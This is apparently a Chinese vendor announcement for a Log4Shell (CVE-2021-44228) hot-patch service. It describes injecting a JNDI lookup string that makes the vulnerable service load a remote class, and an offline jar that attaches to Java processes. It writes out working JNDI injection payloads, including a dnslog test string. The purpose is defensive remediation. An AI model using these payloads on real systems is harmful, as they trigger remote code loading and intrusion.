利用漏洞修复漏洞:青藤提供的「Log4j命令注入漏洞(CVE-2021-44228)」【免重启】在线热补丁服务现已上线!

史诗级的漏洞CVE-2021-44228爆发以来,各安全厂商提供了各种漏洞检测工具,也提供了各种漏洞修复方案。但是在修复过程中遇到无尽的坑,比如更新版本需要重启服务也不见得那么方便,改代码需要一定周期,临时修复方法错误(系统环境变量未生效),Log4j 2.0-2.10版本无临时修复方案,jdk升级高版本存在bypass且仍然可以造成信息泄露等。

鉴于以上问题,青藤推出在线&离线临时修复方案,帮助大家迅速修复漏洞,度过“修改代码->测试->上线正式升级版本”这段时间差,避免发生实际损失。

Log4jPatch原理

Log4jPatch 利用本次 Log4j 漏洞本身的任意代码执行能力,将 Payload 注入到目标 Java 进程中,通过反射调用,禁用了 Log4j 对 jndi 的支持,使得后续对该漏洞的利用无效,完成漏洞修复,总而言之,就是利用漏洞把漏洞补上。

Log4jPatch造成的影响

1.Log4j无法使用jndi,如果Log4j业务使用了jndi那么就会受到影响(这样的程序员就应该被安全工程师吊起来打)。

2. 由于注入到目标 Java 进程中的 Payload 极小(<1.6KB),且变更逻辑简单,对于担心jvm内存的用户来说请放心。等您进行代码级别的修复之后,只需要重启服务patch就不会再驻留在内存中。

Log4jPatch修复方法

1. 如何使用青藤的Log4jPatch在线补丁服务

1.1 修复人员在漏洞注入点(如用户名、搜索框、前端站点表单字段等等漏洞的触发点,不需要提供给青藤),把注入payload修改为:${jndi:ldaps://cve-2021-44228.qingteng.cn:8443/patch}。

1.2 存在漏洞的业务会到cve-2021-44228.qingteng.cn去远程加载class文件,把jvm虚拟机中的jndi给禁用。

1.3 修复验证:按照之前查找验证存在漏洞的方式进行测试,比如${jndi:ldap:xxxxx.dnslog.xxcnxx/exp},漏洞验证不成功则说明漏洞修复成功。

验证demo

patch前后效果对比

patch前,利用漏洞访问 1.5gwpt7.dnslog.cn 成功;patch后,利用漏洞访问 2.5gwpt7.dnslog.cn 失败;手动访问 curl 3.5gwpt7.dnslog.cn 成功,证明 dnslog 有效(附时间戳证明连续性)。

2. 如果业务无法访问互联网服务,还可以使用青藤提供的离线jar包进行热修复

jar包修复原理:利用 JVM 提供的 Instrumentation API来更改加载到 JVM 中的现有字节码,https://docs.oracle.com/javase/6/docs/api/java/lang/instrument/Instrumentation.html。在不重启Java进程的情况下,修改org.apache.logging.log4j.core.lookup.JndiLookup类的lookup方法,固定返回Patched JndiLookup::lookup()。
       2.1https://cve-2021-44228.qingteng.cn/patch/jar/cve-2021-44228-qingteng-patch.tar.gz地址下载Log4jPatch的jar包。

2.2 Log4jPatch的jar包上传到存在漏洞的服务器,然后执行命令。

Linux:传到服务器,然后解压,cd 进入到解压后的cve-2021-44228-qingteng-patch目录,参考 README.md,执行 attach.sh 。

attach.sh例子

● ./attach.sh 不带pid将使用jps列出此机器上所有java进程,然后输入行号选择进程来进行注入修复,输入all将会注入所有列出的java进程。

● 可输入多个,空格分割。

windows:

● 双击 attach.bat, 然后输入java进程pid

● 或者cmd命令行里传入pid,例如: attach.bat pid

2.3 离线的修复验证:按照之前查找验证存在漏洞的方式进行测试,如:burpcollaborator进行验证,漏洞验证不成功则说明漏洞修复成功。

注意:使用以上两种修复方式需要您拥有系统的所有权,并且理解修复的原理和方法。

FAQ:

Q:青藤怎么保证修复方式安全可靠?

A:

1.青藤完全不需要您提供业务的漏洞细节,这完全掌握您的手中,我们并不清楚也不需要具体的注入点;

2.源码开源,项目地址:

https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch 和https://github.com/qingtengyun/cve-2021-44228-qingteng-patch;

3.开源项目中提供了所用到的class文件和jar包文件的hash值;

4.到https://cve-2021-44228.qingteng.cn/patch/class/patch.class和https://cve-2021-44228.qingteng.cn/patch/jar/cve-2021-44228-qingteng-patch.tar.gz下载class文件和jar包进行对比。

Q:青藤patch修复之后就永久生效么?

A:只要不重启服务,该方式可以一直生效,一旦您重启了服务,需要再次对注入点打patch,直到代码级修复上线。

Q:青藤提供的修复支持的java版本是多少?

A:在线修复patch支持JDK版本6、7、8、9、10、11,离线修复的支持JDK版本6、7、8、9、10、11。

Q:我不知道注入点在哪里,但是引用了Log4j,能使用青藤的修复补丁么?

A:可以,使用离线jar包不需要提供注入点,只需要知道进程id。

Q:我不知道我有没有用Log4j,你能帮我看看么?

A:关注公众号「青藤技术服务」,点击《一夜没睡的你,需要快速了解主机资产》了解详情。